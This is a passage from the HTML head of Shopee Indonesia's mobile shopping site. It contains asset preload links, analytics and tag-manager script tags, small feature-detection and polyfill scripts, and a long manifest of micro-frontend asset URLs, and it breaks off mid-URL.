<html dir="ltr" lang="id">
<head>
<style>
body {transition: opacity ease-in 0.2s; } 
body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; }
</style>
<link rel="preconnect" href="//down-id.img.susercontent.com/">
<link rel="preconnect" href="//deo.shopeemobile.com/shopee/">
<link rel="preconnect" href="//cv.shopee.co.id/">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover">
<meta name="shopee:git-sha" content="6b3f33819f7f488f4d43a9afe175c0e608e81f98">
<meta name="shopee:version" content="rw-v4.72.0">
<link rel="icon" type="image/png" sizes="32x32" href="/mobilemall-assets/assets/icon_favicon_1_32.png">
<link rel="icon" type="image/png" sizes="96x96" href="/mobilemall-assets/assets/icon_favicon_1_96.png">
<link rel="preload" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.18d594e05db33dc7.css" as="style" data-modern="true">
<link rel="modulepreload" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/webpack-runtime.3e4c1abcf683862f.js" data-modern="true">
<link rel="modulepreload" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/entry-modules.812bedd0f4ca6077.js" data-modern="true">
<link rel="modulepreload" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.50f2d053c15a863c.js" data-modern="true">
<link rel="modulepreload" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/modules.249ec469f1b4804c.js" data-modern="true">
<script type="text/javascript" async="" src="https://www.google-analytics.com/plugins/ua/linkid.js"></script>
<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script>
<script type="text/javascript" async="" src="https://static.hotjar.com/c/hotjar-955851.js?sv=7"></script>
<script type="text/javascript" async="" src="https://www.googletagmanager.com/gtag/js?id=G-SW6D8G0HXK&amp;l=dataLayer&amp;cx=c"></script>
<script async="" src="https://connect.facebook.net/en_US/fbevents.js"></script>
<script async="" src="https://www.googletagmanager.com/gtm.js?id=GTM-WJZQSJF"></script>

<script>!function(){if(self.document){var e=self.document.createElement("script"),t="noModule"in e,n=t;Object.defineProperty(self,"SUPPORT_MODULE",{get:function(){return n},configurable:!1,enumerable:!1}),!t&&"onbeforeload"in e&&(self.document.addEventListener("beforeload",(function(t){if(t.target===e)n=!0;else if(!t.target.hasAttribute("nomodule")||!n)return;t.preventDefault()}),!0),e.type="module",e.src=".",self.document.head.appendChild(e),e.remove())}}();</script>
<script>!function(){var A=["lossy","lossless","alpha","animation"];function t(A,t){var n=new Image;n.onload=function(){var o=n.width>0&&n.height>0;t(A,o)},n.onerror=function(){t(A,!1)},n.src="data:image/webp;base64,"+{lossy:"UklGRiIAAABXRUJQVlA4IBYAAAAwAQCdASoBAAEADsD+JaQAA3AAAAAA",lossless:"UklGRhoAAABXRUJQVlA4TA0AAAAvAAAAEAcQERGIiP4HAA==",alpha:"UklGRkoAAABXRUJQVlA4WAoAAAAQAAAAAAAAAAAAQUxQSAwAAAARBxAR/Q9ERP8DAABWUDggGAAAABQBAJ0BKgEAAQAAAP4AAA3AAP7mtQAAAA==",animation:"UklGRlIAAABXRUJQVlA4WAoAAAASAAAAAAAAAAAAQU5JTQYAAAD/////AABBTk1GJgAAAAAAAAAAAAAAAAAAAGQAAABWUDhMDQAAAC8AAAAQBxAREYiI/gcA"}[A]}function n(t,n){var o=function(t){var n={};if(!t||1!==t.length)return n;for(var o=parseInt(t,16).toString(2);o.length<4;)o="0"+o;for(var s=0;s<A.length;s++)n[A[s]]="1"===o[s];return n}(sessionStorage.getItem("shopee_webp_support"));o[t]=n,sessionStorage.setItem("shopee_webp_support",function(t){var n="0000";if(!(t instanceof Object))return n;for(var o=0;o<A.length;o++)!0===t[A[o]]&&(n=n.substring(0,o)+"1"+n.substring(o+1));return parseInt(n,2).toString(16)}(o))}function o(A,t){try{n(A,t)}catch(A){}}sessionStorage.getItem("shopee_webp_support")||(t("lossy",o),t("lossless",o),t("alpha",o),t("animation",o))}();</script>
<script nomodule="" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/polyfill-legacy.0388a9333bc3de61.legacy.js"></script>
<script>!function(){var t=/^\/(?:supermarket|cart|checkout|search)(?:\/|$)/,e=document&&document.querySelector('script[type^="text/shopee-short-url-checked"]'),o=!(!e||"1"!==e.textContent),a=location&&location.origin||"";function n(){document&&document.body&&(document.body.style.visibility="visible")}var r="";function i(e){var o=function(t){var e=document.createElement("a");return e.href=t,{pathname:e.pathname,hash:e.hash,search:e.search,protocol:e.protocol}}(e),i=o.pathname,s=o.hash,c=i.replace(/\/+$/,"");if(r!==c&&(r=c,"/"!==i&&!function(e){return t.test(e)}(i)&&function(t){return 1===t.split("/").filter(Boolean).length}(i)&&i.length<256&&""===s&&0===i.lastIndexOf("/"))){document&&document.body&&(document.body.style.visibility="hidden"),setTimeout(n,5e3);var h=new XMLHttpRequest;h.open("GET",a+"/api/v4/pages/is_short_url/?path="+i.replace("/","")),h.setRequestHeader("Content-Type","application/json"),h.setRequestHeader("Accept","application/json"),h.onreadystatechange=function(){if(4===this.readyState)if(200===this.status){var t=JSON.parse(this.responseText);t&&t.data&&t.data.url?(console.log("Redirecting via short url to: res.data.url"),location.href=t.data.url):n()}else n()},h.send()}}var s=window.history.pushState;window.history.pushState=function(){var t=arguments[2];t&&i(t),s.apply(history,arguments)};var c=window.history.replaceState;window.history.replaceState=function(){var t=arguments[2];t&&i(t),c.apply(history,arguments)},o||i(location.href)}();</script>
<script>if(window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)},ga.l=+new Date,window.PerformanceObserver)try{var observer=new window.PerformanceObserver((function(e){for(var r=e.getEntries(),n=0;n<r.length;n++){var a=r[n],i=a.name,t=Math.round(a.startTime+a.duration);ga("send",{hitType:"timing",timingCategory:"Performance Metrics",timingVar:i,timingValue:t})}}));observer.observe({entryTypes:["paint"]})}catch(e){}</script>
<script>"loading"in HTMLImageElement.prototype?document.addEventListener("DOMContentLoaded",(function(){document.querySelectorAll("img[loading].lazyload").forEach((function(e){e.dataset.src&&(e.src=e.dataset.src),e.dataset.srcset&&(e.srcset=e.dataset.srcset)}))})):document.write('<script type="text/javascript" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/polyfill.6eeeee64c6017caa.js"><\/script>')</script>
<script>"IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype&&"isIntersecting"in window.IntersectionObserverEntry.prototype||document.write('<script type="text/javascript" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/polyfill.e74248e871a636a1.js"><\/script>')</script>
<script>window.MutationObserver||document.write('<script type="text/javascript" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/polyfill.909f7922f04e46f7.js"><\/script>')</script>
<script>!function(){var e=document.createElement("div").style;e.setProperty&&e.setProperty("--x","x"),e.getPropertyValue&&"x"===e.getPropertyValue("--x")||(document.write('<script type="text/javascript" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/polyfill.0b761ff65aca5425.js"><\/script>'),document.write("<script>window.cssVars({preserveVars:!0,watch:!0});<\/script>"))}()</script>
<script src="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/index.js"></script>
<script id="gtm-script" data-locale="id" data-gtm-id="GTM-WJZQSJF" data-delay-load="true">!function(t,e,a,n){t[n]=[];var o=["PL","ES","BR"].indexOf(__LOCALE__)>=0,r=o?"denied":"granted";!function(){dataLayer.push(arguments)}("consent","default",{consent_analytical:r,consent_functional:r,consent_advertising:r,consent_thirdparty_google:r,consent_thirdparty_tiktok:r,wait_for_update:o?15e3:0});var d=document.currentScript||document.getElementById("gtm-script");if(d){var i=d.getAttribute("data-locale"),c=d.getAttribute("data-gtm-id"),s=d.getAttribute("data-delay-load"),u="",g=0;s&&(u="delay",g=5e3),t[n]=t[n]||[];var m=Date.now(),_={"gtm.start":m,event:"gtm.js",country:i};u&&(_.userGroup=u),t[n].push(_);var l=!1;t.__shopeeLoadGTM=function(){l||(l=!0,g=Math.max(0,Math.min(g,g-(Date.now()-m))),setTimeout((function(){var t=e.getElementsByTagName(a)[0],n=e.createElement(a);n.async=!0,n.src="https://www.googletagmanager.com/gtm.js?id="+c,t.parentNode.insertBefore(n,t)}),g))},o||t.__shopeeLoadGTM()}}(window,document,"script","dataLayer");</script>
<script>var spt=[]</script>
<link href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.18d594e05db33dc7.css" data-modern="true" rel="stylesheet">
<link rel="manifest" href="/mobilemall-assets/assets/manifest.d08c13e4fd1bf1b5ddc5b7933dc779fa.json">
<meta name="mobile-web-app-capable" content="yes">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="apple-mobile-web-app-title" content="Shopee">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="default">
<link rel="apple-touch-icon" size="120x120" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_icon_120x120.9c9cd4366011639d86dcf03856866b39.png">
<link rel="apple-touch-icon" size="180x180" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_icon_180x180.350d4cdc7ba40b87541691005bda74c5.png">
<link rel="apple-touch-startup-image" media="(device-width: 320px) and (device-height: 568px) and (-webkit-device-pixel-ratio: 2)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_640x1136.44f3b1919faea215b1e8a8f33bc85eb2.png">
<link rel="apple-touch-startup-image" media="(device-width: 375px) and (device-height: 667px) and (-webkit-device-pixel-ratio: 2)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_750x1334.e7f516f762373cc6c316d37455600b8a.png">
<link rel="apple-touch-startup-image" media="(device-width: 621px) and (device-height: 1104px) and (-webkit-device-pixel-ratio: 3)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_1242x2208.0030ddfcb47d1a8f7f34ea1f488e063d.png">
<link rel="apple-touch-startup-image" media="(device-width: 375px) and (device-height: 812px) and (-webkit-device-pixel-ratio: 3)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_1125x2436.d03df48b337e7e7f19d94203a800123b.png">
<link rel="apple-touch-startup-image" media="(device-width: 414px) and (device-height: 896px) and (-webkit-device-pixel-ratio: 2)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_828x1792.848d89109908599fcf6edf6e0b7c6cde.png">
<link rel="apple-touch-startup-image" media="(device-width: 414px) and (device-height: 896px) and (-webkit-device-pixel-ratio: 3)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_1242x2688.806794fa2096fd0d63f138f9380033ab.png">
<link rel="apple-touch-startup-image" media="(device-width: 360px) and (device-height: 780px) and (-webkit-device-pixel-ratio: 3)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_1080x2340.b159e955714fc4bfcee0415d7a196559.png">
<link rel="apple-touch-startup-image" media="(device-width: 390px) and (device-height: 844px) and (-webkit-device-pixel-ratio: 3)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_1170x2532.7d66e217dfb6824abb4829a8c0092554.png">
<link rel="apple-touch-startup-image" media="(device-width: 428px) and (device-height: 926px) and (-webkit-device-pixel-ratio: 3)" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/ios_splash_screen_1284x2778.91b92b6b72c0355991793e6f3bf45eaf.png">
<script type="text/shopee-page-manifest">{"mobilemall-micrositefe":"https://deo.shopeemobile.com/shopee/stm-sg-live/60742/asset-ID-live.2d364fb01e700fa0b31d93fb9c7e6207.json","mobilemall-cart":"https://deo.shopeemobile.com/shopee/stm-sg-live/2300/asset-ID-live.446d62209690dda445588a08cf78ed42.json","mobilemall-paymentfe":"https://deo.shopeemobile.com/shopee/stm-sg-live/3059/asset-ID-live.cb67bcd7cd33ab14f7b2fcbb0d9ecc10.json","mobilemall-coinsrewardpage":"https://deo.shopeemobile.com/shopee/stm-sg-live/4983/asset-ID-live.9f94cfc41f0bc1e78feeb5cfe201023d.json","mobilemall-shop":"https://deo.shopeemobile.com/shopee/stm-sg-live/5067/asset-ID-live.b2cf0a7812111a0669c1b1b5cd02ee71.json","mobilemall-chatbroadcast":"https://deo.shopeemobile.com/shopee/stm-sg-live/5273/asset-ID-live.0d0df1ab1e3b9c0d31feb40bc8288a24.json","mobilemall-return":"https://deo.shopeemobile.com/shopee/stm-sg-live/5561/asset-ID-live.8cfbf24a70259ec4a1d6225da64e9903.json","mobilemall-flashsale":"https://deo.shopeemobile.com/shopee/stm-sg-live/7767/asset-ID-live.980d359cc539d7a436f92e26f4f99efa.json","mobilemall-orderlist":"https://deo.shopeemobile.com/shopee/stm-sg-live/7899/asset-ID-live.7a3adcb8452ce6e034ece983f3be2a71.json","mobilemall-bundledeal":"https://deo.shopeemobile.com/shopee/stm-sg-live/13359/asset-ID-live.bf2022c1ce5dd517090650cd33c7d3d0.json","mobilemall-sclp":"https://deo.shopeemobile.com/shopee/stm-sg-live/webfe-rp-assets/15071/asset-ID-live.7cc18980fa9cb26f71e58f920990005b.json","mobilemall-dailycheckin":["https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/dailycheckin/main.da1b97a52225512efaa3.css","https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/dailycheckin/main.cee88ffc30251dae80de.js"],"mobilemall-addondeal-aod":"https://deo.shopeemobile.com/shopee/stm-sg-live/16972/asset-ID-live.bde24a1544a24d71315671113fbcf2b4.json","mobilemall-addondeal-pwg":"https://deo.shopeemobile.com/shopee/stm-sg-live/17362/asset-ID-live.5e07e1cf0b247fcbb515e6d69dc2c7ae.json","mobilemall-addondeal-pwp":"https://deo.shopeemobile.com/shopee/stm-sg-live/17572/asset-ID-live.20d8c9161da4c7bc3fe7c93a9ba9381f.json","mobilemall-brandsale":"https://deo.shopeemobile.com/shopee/stm-sg-live/17857/asset-ID-live.90d7adedf318d4a99de22f9c6fd90440.json","mobilemall-flashsaleentrance":"https://deo.shopeemobile.com/shopee/stm-sg-live/17897/asset-ID-live.9ada0d2b5a7f2e44e141e2f0b2a67899.json","mobilemall-brandsaleentrance":"https://deo.shopeemobile.com/shopee/stm-sg-live/17966/asset-ID-live.86aefe71fbc883f59e2b2631ba9e13dc.json","mobilemall-smartflashsale":"https://deo.shopeemobile.com/shopee/stm-sg-live/18030/asset-ID-live.0b637f895eb6a684eb6b2b9a30b67951.json","mobilemall-smartflashsaleentrance":"https://deo.shopeemobile.com/shopee/stm-sg-live/18090/asset-ID-live.cec189635add8b95ed66214c3f121fa8.json","mobilemall-shopcustompage":"https://deo.shopeemobile.com/shopee/stm-sg-live/18904/asset-ID-live.624be001a95a621b726c2c80693bbfe7.json","mobilemall-useraccount":"https://deo.shopeemobile.com/shopee/stm-sg-live/22297/asset-ID-live.aa5233069787e60729a5bc452a4f2035.json","mobilemall-rcmd-cart-ymal":"https://deo.shopeemobile.com/shopee/stm-sg-live/23232/asset-ID-live.afd07f51442b4758268c99c255972b2c.json","mobilemall-homepage":"https://deo.shopeemobile.com/shopee/stm-sg-live/23412/asset-ID-live.febb2957413789e6f2166adb9b62c720.json","mobilemall-platformvouchers":"https://deo.shopeemobile.com/shopee/stm-sg-live/23679/asset-ID-live.50eed51e08cf0b154d5cfed18a171ebd.json","mobilemall-shopvouchers":"https://deo.shopeemobile.com/shopee/stm-sg-live/23860/asset-ID-live.9e84740713a2d956b810ef7d487785a9.json","mobilemall-sellervouchercard":"https://deo.shopeemobile.com/shopee/stm-sg-live/23942/asset-ID-live.8feb2fa3e1c0c8658c85731230cb76c8.json","mobilemall-pdpvoucherdrawer":"https://deo.shopeemobile.com/shopee/stm-sg-live/24038/asset-ID-live.26339b4acf7e84376a60794c2e079d3d.json","mobilemall-sellervoucher":"https://deo.shopeemobile.com/shopee/stm-sg-live/24128/asset-ID-live.029cbc7af73ef0a3153561f521d1e542.json","mobilemall-voucherpromotiontext":"https://deo.shopeemobile.com/shopee/stm-sg-live/24219/asset-ID-live.a335f85fabc72834a3ad23964dabc408.json","mobilemall-pagedpvoucherredemption":"https://deo.shopeemobile.com/shopee/stm-sg-live/24305/asset-ID-live.25c69d05169f1b42d34edda3c04aebf3.json","mobilemall-shoppagesellervoucherpreview":"https://deo.shopeemobile.com/shopee/stm-sg-live/24392/asset-ID-live.6ca0371ffe1d94bf92c11f1bc6568e0f.json","mobilemall-micrositepage":"https://deo.shopeemobile.com/shopee/stm-sg-live/25724/asset-ID-live.02f1abb2f625e023d6c47be88fa86a9a.json","mobilemall-ebcomponents-quiz":"https://deo.shopeemobile.com/shopee/stm-sg-live//30752/asset-ID-live.002b3bfea767b61a6be1ad3a263ed227.json","mobilemall-ebcomponents-voting":"https://deo.shopeemobile.com/shopee/stm-sg-live//31902/asset-ID-live.abab29ae04158ca94199d850a54032b2.json","mobilemall-formmanagement":"https://deo.shopeemobile.com/shopee/stm-sg-live/32378/asset-ID-live.a1b4b80f2430f1771fd217ebe3142d3a.json","mobilemall-coins":"https://deo.shopeemobile.com/shopee/stm-sg-live/32586/asset-ID-live.b0f3a42ab4462dcfddbe03c79ac15558.json","mobilemall-productdetailspage":"https://deo.shopeemobile.com/shopee/stm-sg-live/32724/asset-ID-live.01a88bdb68c150028255fac2e6aa48b4.json","mobilemall-rcmd-flash-sale-sold-out-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/33206/asset-ID-live.a2fb0b8a013555d37c8f1c76fe5b0a95.json","mobilemall-returnevidence":"https://deo.shopeemobile.com/shopee/stm-sg-live/34362/asset-ID-live.451a1c3f36668b906e72bfb8025941ce.json","mobilemall-ebcomponents-mb":"https://deo.shopeemobile.com/shopee/stm-sg-live//34547/asset-ID-live.77e74854023c2a50ed4fc5c21af5a3a0.json","mobilemall-rcmd-category-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/34643/asset-ID-live.ea2de58a12ccdf698eea63d838808810.json","mobilemall-martcategorylistpage":"https://deo.shopeemobile.com/shopee/stm-sg-live/35135/asset-ID-live.c6bdcfe3125493d6f3f22494b436ee16.json","mobilemall-rcmd-pdp-ftss":"https://deo.shopeemobile.com/shopee/stm-sg-live/35507/asset-ID-live.5cd2d2c12485daadc4a449b33a0223b1.json","mobilemall-rcmd-pdp-ymal":"https://deo.shopeemobile.com/shopee/stm-sg-live/35706/asset-ID-live.671f7fea2393482c94ca1792b76c0f1e.json","mobilemall-checkout":"https://deo.shopeemobile.com/shopee/stm-sg-live/36182/asset-ID-live.71a67ec52fa62066f03bb202baf9f59d.json","mobilemall-mart-categorylandingpage":"https://deo.shopeemobile.com/shopee/stm-sg-live/36475/asset-ID-live.6c16406b7f70990adf5b3af1d7b89f00.json","mobilemall-mart-dealspage":"https://deo.shopeemobile.com/shopee/stm-sg-live/36570/asset-ID-live.bfc31a6562e3b8f739cc7904c6eeb572.json","mobilemall-mart-homepage":"https://deo.shopeemobile.com/shopee/stm-sg-live/36665/asset-ID-live.3983dc5bdefad0a2d76fb4633d576c0e.json","mobilemall-rcmd-mart-recommendation-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/39174/asset-ID-live.928821691fe43a96a43c5e671e3bec61.json","mobilemall-malllanding":"https://deo.shopeemobile.com/shopee/stm-sg-live/39369/asset-ID-live.0befb5cc82c4e01d2c22898781df5665.json","mobilemall-mallbrands":"https://deo.shopeemobile.com/shopee/stm-sg-live/39452/asset-ID-live.ae329afdc981f30fe6a2c4e770569d3c.json","mobilemall-mallcategories":"https://deo.shopeemobile.com/shopee/stm-sg-live/39557/asset-ID-live.7aa4e3fb138829289a48abe9044f2cea.json","mobilemall-rcmd-mart-buy-again-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/39989/asset-ID-live.8ecaef63aeb43ef11fdffe24f8c33230.json","mobilemall-rcmd-mart-buy-again-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/40037/asset-ID-live.48b29a2310b5ec582163e1b6ec5f9180.json","mobilemall-rcmd-pdp-ftss-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/40597/asset-ID-live.88e59bbb8a21c00075dbe07221186202.json","mobilemall-rcmd-home-top-products-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/40792/asset-ID-live.e7abf5d1f2f25e043671001e64101c39.json","mobilemall-rcmd-home-top-products-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/40886/asset-ID-live.3483e92694b7080e28e0bce141bb99ad.json","mobilemall-pageitemrating":"https://deo.shopeemobile.com/shopee/stm-sg-live/41296/asset-ID-live.c8033aaaa11daa8a6e56aecdedde2233.json","mobilemall-pageratingreport":"https://deo.shopeemobile.com/shopee/stm-sg-live/41419/asset-ID-live.fadc8f9677609259ac7d70b4b8d58462.json","mobilemall-pagereplyrating":"https://deo.shopeemobile.com/shopee/stm-sg-live/41515/asset-ID-live.edaf7ba073847c36e60b561c175e848f.json","mobilemall-pageshoprating":"https://deo.shopeemobile.com/shopee/stm-sg-live/41610/asset-ID-live.0e9d2cfe1fbff5dc87e6d568f5b8a73b.json","mobilemall-rcmd-featured-collections-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/41794/asset-ID-live.33ace949a9acb4d1d1977579cb52e96d.json","mobilemall-welcomepackage":"https://deo.shopeemobile.com/shopee/stm-sg-live/41887/asset-ID-live.dbae2201655aadd1a22d99fb476bdc28.json","mobilemall-productrating":"https://deo.shopeemobile.com/shopee/stm-sg-live/42071/asset-ID-live.1e257ded4b600b03f51a3cfdb212f22d.json","mobilemall-mart-navigation-bar":"https://deo.shopeemobile.com/shopee/stm-sg-live/42272/asset-ID-live.07c672cf06eb0d3293a7b5f57bb59043.json","mobilemall-mart-voucherlandingpage":"https://deo.shopeemobile.com/shopee/stm-sg-live/42557/asset-ID-live.e7d999d9e0a4ac9279e36425676a86af.json","mobilemall-rcmd-fsp-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/42848/asset-ID-live.eb39576b80685ea92b8fe87a42e0082f.json","mobilemall-rcmd-featured-collections-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/43042/asset-ID-live.bca1e9b51c3c710ccdf7c5614f49b8a6.json","user-microfe-identity-mobile-demo-1":"https://deo.shopeemobile.com/shopee/stm-sg-live/50236/asset-ID-live.c2426c2529b6b5a97d88deef23ba6726.json","user-microfe-identity-mobile-demo-2":"https://deo.shopeemobile.com/shopee/stm-sg-live/50337/asset-ID-live.9c647ac641c6e4bb0ebbb1edd5366937.json","user-microfe-identity-mobile-noti-email-subscription-center":"https://deo.shopeemobile.com/shopee/stm-sg-live/51104/asset-ID-live.a89039d0899f406959d46adf42209eb0.json","mobilemall-anticrawler":"https://deo.shopeemobile.com/shopee/stm-sg-live/51304/asset-ID-live.d303f15cca18e5c4d8b78d40458388e6.json","mobilemall-returnlegacy":"https://deo.shopeemobile.com/shopee/stm-sg-live//51584/asset-ID-live.67b7f26b6241ff05af372570819425a5.json","mobilemall-captcha":"https://deo.shopeemobile.com/shopee/stm-sg-live/51776/asset-ID-live.61200274c94409e6d390ae8e86191fd1.json","mobilemall-invoicepage":"https://deo.shopeemobile.com/shopee/stm-sg-live/52081/asset-ID-live.e74595e80cd568cdd5dfd861294cc5cb.json","mobilemall-captchapopup":"https://deo.shopeemobile.com/shopee/stm-sg-live/52158/asset-ID-live.091328d62e5d7da82cb78c8202b489f9.json","mobilemall-dd-landing-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/52697/asset-ID-live.a6a5fa4ed0b7586be6615ae5fe9aab25.json","mobilemall-dd-home-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/52730/asset-ID-live.93b9de5c743e50a7db238d5543b6ac02.json","mobilemall-rcmd-mall-just-for-you-module":"https://deo.shopeemobile.com/shopee/stm-sg-live/53317/asset-ID-live.53e17643146b01236e56f07a3e573597.json","mobilemall-rcmd-mall-just-for-you-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/53415/asset-ID-live.0ceaa63e29ef9583950851d7ae2edaf8.json","mobilemall-collectionfe-productcollection":"https://deo.shopeemobile.com/shopee/stm-sg-live/53978/asset-ID-live.aeb0ea0d83ca2db36186e8994e4997c2.json","mobilemall-collectionfe-product-clp":"https://deo.shopeemobile.com/shopee/stm-sg-live/54181/asset-ID-live.0349b81a1ac51cca2c5d7d03806be417.json","mobilemall-collectionfe-shop-clp":"https://deo.shopeemobile.com/shopee/stm-sg-live/54276/asset-ID-live.5d43cd2154c5daf96d66ca6cbbab6e93.json","mobilemall-collectionfe-entry-clp":"https://deo.shopeemobile.com/shopee/stm-sg-live/54367/asset-ID-live.2a04c7872bfa29b0b646962d29d8b168.json","mobilemall-collectionfe-allcampaigns":"https://deo.shopeemobile.com/shopee/stm-sg-live/54562/asset-ID-live.7353a13f6f4d82f578af7c8dfaf63177.json","mobilemall-antifraudverifyqr":"https://deo.shopeemobile.com/shopee/stm-sg-live/54658/asset-ID-live.802772efad09bb71f56b488a717aaa90.json","mobilemall-antifraudverifylink":"https://deo.shopeemobile.com/shopee/stm-sg-live/54754/asset-ID-live.1a5f93db9d2d00051ee1d2191b563c3e.json","mobilemall-antifraudivs":"https://deo.shopeemobile.com/shopee/stm-sg-live/55103/asset-ID-live.ded6766e8778334449e2a888b4b96873.json","mobilemall-antifraudverifyemaillink":"https://deo.shopeemobile.com/shopee/stm-sg-live/55390/asset-ID-live.fd669b2ad83ac9d5127cd4cdda1b55e2.json","mobilemall-antifraudverifylinkreceiver":"https://deo.shopeemobile.com/shopee/stm-sg-live/57249/asset-ID-live.d2540207fb27d3e4034c4695ed5b0301.json","mobilemall-antifraudverifyemaillinkreceiver":"https://deo.shopeemobile.com/shopee/stm-sg-live/57346/asset-ID-live.c1d74635e4ccc805be5558bb957eda1e.json","mobilemall-categoryfe":"https://deo.shopeemobile.com/shopee/stm-sg-live/57458/asset-ID-live.25711a467d8d735156d832d532dd2c5c.json","mobilemall-search-intermediate-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/59287/asset-ID-live.f51155172b9e73e1256d40c1af5779c2.json","mobilemall-homepagefe":"https://deo.shopeemobile.com/shopee/stm-sg-live/59761/asset-ID-live.4bb28d6385a3c3564911d324e1484157.json","mobilemall-seo-brand-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/60240/asset-ID-live.2764f38bc5e9af82c598fd3abe1b61a8.json","mobilemall-search-mart-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/60442/asset-ID-live.30f040cb3c8bca4b3ed38efdbeee59fe.json","mobilemall-search-result-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/60918/asset-ID-live.93de3c923a0203770bedef9c5a1a22f2.json","mobilemall-flashsalesoldout":"https://deo.shopeemobile.com/shopee/stm-sg-live/31328/asset-ID-live.e992488f3c90c89a1e988de46cb090f2.json","mobilemall-rcmd-pdp-hot-sales":"https://deo.shopeemobile.com/shopee/stm-sg-live/43710/asset-ID-live.2245aa9588ddf60bb17b689ddf308d5c.json","mobilemall-search-srp-user":"https://deo.shopeemobile.com/shopee/stm-sg-live/44470/asset-ID-live.aecd211f38908d6a8892501a20065bb6.json","VOUCHER_CARD_MANIFEST":{"live":"vouchercard-v0.21.0"},"mobilemall-search-user-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/44670/asset-ID-live.faa63d6c8e4addc8d9c3487eda4c6ced.json","mobilemall-rcmd-home-top-products-list-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/45156/asset-ID-live.934a2900976a3b04de767353f11d451a.json","user-microfe-account-mobile-demo":"https://deo.shopeemobile.com/shopee/stm-sg-live/48996/asset-ID-live.6228eec2dfd7625baf620a7cc97ed01a.json","mobilemall-returndetail":"https://deo.shopeemobile.com/shopee/stm-sg-live/47493/asset-ID-live.b17b59c9122b2fd013290bc571420d2b.json","mobilemall-antifrauderror":"https://deo.shopeemobile.com/shopee/stm-sg-live/47263/asset-ID-live.3fb84dd9a31be33bf4658bed61fde63a.json","user-microfe-account-mobile-demo-2":"https://deo.shopeemobile.com/shopee/stm-sg-live/50049/asset-ID-live.540d3e3f7be509f5819197ff93ac2ef1.json","mobilemall-vouchermarthomepage":"https://deo.shopeemobile.com/shopee/stm-sg-live/49379/asset-ID-live.ffc9fe17a939d19c5ba9efe752362426.json","mobilemall-vouchermartlandingpage":"https://deo.shopeemobile.com/shopee/stm-sg-live/49471/asset-ID-live.ba7fef990e94caab5e2bca0e3e7f0f42.json","mobilemall-rcmd-featured-collections-list-page":"https://deo.shopeemobile.com/shopee/stm-sg-live/49286/asset-ID-live.56bffae7d53d46781878dc2e3fa2ef5e.json","mobilemall-returnrequestissue":"https://deo.shopeemobile.com/shopee/stm-sg-live/50433/asset-ID-live.92af9b607b6b1ee4e5ea8b3a9bfaa8ef.json","mobilemall-returnrequestsummary":"https://deo.shopeemobile.com/shopee/stm-sg-live/50628/asset-ID-live.89a3622a0f4c4f5dfa17c72eba5eb54d.json","mobilemall-returnrequestitemselect":"https://deo.shopeemobile.com/shopee/stm-sg-live/50534/asset-ID-live.d17c99dbd062ef4fb03856ec3eeb7e88.json","user-microfe-account-mobile-verify-account-seller-main-sub":{"version":1,"assets":{},"metaAppDetails":{},"legacy":{"js":["https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/runtime.8e805b15ef6cb8aa3765.legacy.js","https://deo.shopeemobile.com/shopee/shopee-mobilema